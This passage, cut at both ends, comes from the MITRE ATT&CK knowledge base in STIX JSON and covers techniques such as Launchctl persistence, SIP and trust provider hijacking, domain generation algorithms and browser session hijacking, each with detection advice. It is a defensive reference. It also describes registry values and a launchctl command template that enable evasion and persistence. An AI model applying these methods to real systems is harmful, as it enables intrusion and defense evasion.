"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-ics-attack", "url": "https://attack.mitre.org/techniques/T0841", "external_id": "T0841"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:05.190Z", "name": "Indicator Removal on Host", "description": "Adversaries may attempt to remove indicators of their presence on a system in an effort to cover their tracks. In cases where an adversary may feel detection is imminent, they may try to overwrite, delete, or cover up changes they have made to the device.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Command: Command Execution", "Process: OS API Execution", "Windows Registry: Windows Registry Key Modification", "File: File Metadata", "Windows Registry: Windows Registry Key Deletion", "File: File Deletion", "File: File Modification", "Process: Process Creation"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0872", "external_id": "T0872"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:05.375Z", "name": "I/O Image", "description": "Adversaries may seek to capture process values related to the inputs and outputs of a PLC. During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules.\n\nThe Input and Output Image tables described above make up the I/O Image on a PLC. This image is used by the user program instead of directly interacting with physical I/O. (Citation: Spenneberg, Ralf 2016) \n\nAdversaries may collect the I/O Image state of a PLC by utilizing a devices [Native API](https://attack.mitre.org/techniques/T0834) to access the memory regions directly. The collection of the PLCs I/O state could be used to replace values or inform future stages of an attack.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0877", "external_id": "T0877"}, {"source_name": "Nanjundaiah, Vaidyanath", "description": "Nanjundaiah, Vaidyanath PLC Ladder Logic Basics Retrieved. 2021/10/11 ", "url": "https://www.ezautomation.net/industry-articles/plc-ladder-logic-basics.htm"}, {"source_name": "Spenneberg, Ralf 2016", "description": "Spenneberg, Ralf 2016 PLC-Blaster Retrieved. 2019/06/06 ", "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-01-20T00:07:58.958Z", "name": "Archive Collected Data", "description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network.(Citation: DOJ GRU Indictment Jul 2018) Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nA process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "created": "2020-02-20T20:53:45.725Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1560", "external_id": "T1560"}, {"source_name": "DOJ GRU Indictment Jul 2018", "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.", "url": "https://www.justice.gov/file/1080281/download"}, {"source_name": "Wikipedia File Header Signatures", "description": "Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.", "url": "https://en.wikipedia.org/wiki/List_of_file_signatures"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Launchctl", "description": "Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made (Citation: Sofacy Komplex Trojan). Running a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute \"arg\" \"arg\" \"arg\". Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges. \n\nAdversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "execution"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Knock Knock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk somewhere which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Application whitelisting", "Process whitelisting", "Whitelisting by file name or path"], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--53bfc8bf-8f76-4cd7-8958-49a884ddb3ee", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1152", "external_id": "T1152"}, {"source_name": "Sofacy Komplex Trojan", "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-05-24T14:00:00.188Z", "name": "SIP and Trust Provider Hijacking", "description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nSimilar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)\n\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP\u2019s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file\u2019s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the Dll and FuncName Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID} that point to the DLL providing a SIP\u2019s CryptSIPDllVerifyIndirectData function, which validates a file\u2019s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\n* Modifying the DLL and Function Registry values in HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID} that point to the DLL providing a trust provider\u2019s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP\u2019s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\n* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).\n\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Matt Graeber, @mattifestation, SpecterOps"], "x_mitre_deprecated": false, "x_mitre_detection": "Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nEnable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nUtilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)\n\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\n* HKLM\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\Trust\n* HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers\\Trust\n\n**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1218/010). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure \u201cHide Microsoft Entries\u201d and \u201cHide Windows Entries\u201d are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Autoruns Analysis", "Digital Certificate Validation", "User Mode Signature Validation", "Application Control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc", "created": "2020-02-05T19:34:04.910Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1553/003", "external_id": "T1553.003"}, {"source_name": "Entrust Enable CAPI2 Aug 2017", "description": "Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server?. Retrieved January 31, 2018.", "url": "http://www.entrust.net/knowledge-base/technote.cfm?tn=8165"}, {"source_name": "GitHub SIP POC Sept 2017", "description": "Graeber, M. (2017, September 14). PoCSubjectInterfacePackage. Retrieved January 31, 2018.", "url": "https://github.com/mattifestation/PoCSubjectInterfacePackage"}, {"source_name": "SpectorOps Subverting Trust Sept 2017", "description": "Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.", "url": "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf"}, {"source_name": "Microsoft Catalog Files and Signatures April 2017", "description": "Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018.", "url": "https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files"}, {"source_name": "Microsoft Audit Registry July 2012", "description": "Microsoft. (2012, July 2). Audit Registry. Retrieved January 31, 2018.", "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)"}, {"source_name": "Microsoft Registry Auditing Aug 2016", "description": "Microsoft. (2016, August 31). Registry (Global Object Access Auditing). Retrieved January 31, 2018.", "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)"}, {"source_name": "Microsoft Authenticode", "description": "Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018.", "url": "https://msdn.microsoft.com/library/ms537359.aspx"}, {"source_name": "Microsoft WinVerifyTrust", "description": "Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018.", "url": "https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx"}, {"source_name": "EduardosBlog SIPs July 2008", "description": "Navarro, E. (2008, July 11). SIP\u2019s (Subject Interface Package) and Authenticode. Retrieved January 31, 2018.", "url": "https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Domain Generation Algorithms", "description": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)\n\nDGAs can take the form of apparently random or \u201cgibberish\u201d strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)\n\nAdversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Sylvain Gil, Exabeam", "Barry Shteiman, Exabeam", "Ryan Benson, Exabeam"], "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.\n\nMachine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--54456690-84de-4538-9101-643e26437e09", "created": "2019-02-18T17:22:57.831Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1483", "external_id": "T1483"}, {"source_name": "Cybereason Dissecting DGAs", "description": "Sternfeld, U. (2016). Dissecting Domain Generation Algorithms: Eight Real World DGA Variants. Retrieved February 18, 2019.", "url": "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf"}, {"source_name": "Cisco Umbrella DGA", "description": "Scarfo, A. (2016, October 10). Domain Generation Algorithms \u2013 Why so effective?. Retrieved February 18, 2019.", "url": "https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/"}, {"source_name": "Unit 42 DGA Feb 2019", "description": "Unit 42. (2019, February 7). Threat Brief: Understanding Domain Generation Algorithms (DGA). Retrieved February 19, 2019.", "url": "https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/"}, {"source_name": "Talos CCleanup 2017", "description": "Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.", "url": "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html"}, {"source_name": "Akamai DGA Mitigation", "description": "Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of Domain Generation Algorithms. Retrieved February 18, 2019.", "url": "https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html"}, {"source_name": "FireEye POSHSPY April 2017", "description": "Dunwoody, M.. (2017, April 3). Dissecting One of APT29\u2019s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.", "url": "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html"}, {"source_name": "ESET Sednit 2017 Activity", "description": "ESET. (2017, December 21). Sednit update: How Fancy Bear Spent the Year. Retrieved February 18, 2019.", "url": "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/"}, {"source_name": "Data Driven Security DGA", "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019.", "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/"}, {"source_name": "Pace University Detecting DGA May 2017", "description": "Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically Generated Domains Using Data Visualization and N-Grams Methods . Retrieved April 26, 2019.", "url": "http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf"}, {"source_name": "Elastic Predicting DGA", "description": "Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November 2). Predicting Domain Generation Algorithms with Long Short-Term Memory Networks. Retrieved April 26, 2019.", "url": "https://arxiv.org/pdf/1611.00791.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Browser Session Hijacking", "description": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)\n\nA specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.\n\nAnother example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Justin Warner, ICEBRG"], "x_mitre_detection": "This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. New processes may not be created and no additional software dropped to disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1185", "external_id": "T1185"}, {"source_name": "Wikipedia Man in the Browser", "description": "Wikipedia. (2017, October 28). Man-in-the-browser. Retrieved January 10, 2018.", "url": "https://en.wikipedia.org/wiki/Man-in-the-browser"}, {"source_name": "Cobalt Strike Browser Pivot", "description": "Mudge, R. (n.d.). Browser Pivoting. Retrieved January 10, 2018.", "url": "https://www.cobaltstrike.com/help-browser-pivoting"}, {"source_name": "ICEBRG Chrome Extensions", "description": "De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018.", "url": "https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses"}, {"source_name": "cobaltstrike manual", "description": "Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.", "url": "https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-03-01T15:35:38.299Z", "name": "Remote Services", "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain. \n\nLegitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Dan Borges, @1njection"], "x_mitre_deprecated": false, "x_mitre_detection": "Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. \n\nUse of applications such as ARD may be legitimate depending on the environment and how it\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using these applications. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. \n\nIn macOS, you can review logs for \"screensharingd\" and \"Authentication\" event messages. Monitor network connections regarding remote management (ports tcp:3283 and tcp:5900) and for remote login (port tcp:22).(Citation: Lockboxx ARD 2019)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "IaaS"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["Active remote service accepting connections and valid credentials"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", "created": "2017-05-31T21:30:29.858Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1021", "external_id": "T1021"}, {"source_name": "Apple Remote Desktop Admin Guide 3.3", "description": "Apple. (n.d.). Apple Remote Desktop Administrator Guide Version 3.3. Retrieved October 5, 2021.", "url": "https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf"}, {"source_name": "Remote Management MDM macOS", "description": "Apple. (n.d.). Use MDM to enable Remote Management in macOS. Retrieved September 23, 2021.", "url": "https://support.apple.com/en-us/HT209161"}, {"source_name": "Kickstart Apple Remote Desktop commands", "description": "Apple. (n.d.). Use the kickstart command-line utility in Apple Remote Desktop. Retrieved September 23, 2021.", "url": "https://support.apple.com/en-us/HT201710"}, {"source_name": "Lockboxx ARD 2019", "description": "Dan Borges. (2019, July 21). MacOS Red Teaming 206: ARD (Apple Remote Desktop Protocol). Retrieved September 10, 2021.", "url": "http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html"}, {"source_name": "FireEye 2019 Apple Remote Desktop", "description": "Jake Nicastro, Willi Ballenthin. (2019, October 9). Living off the Orchard: Leveraging Apple Remote 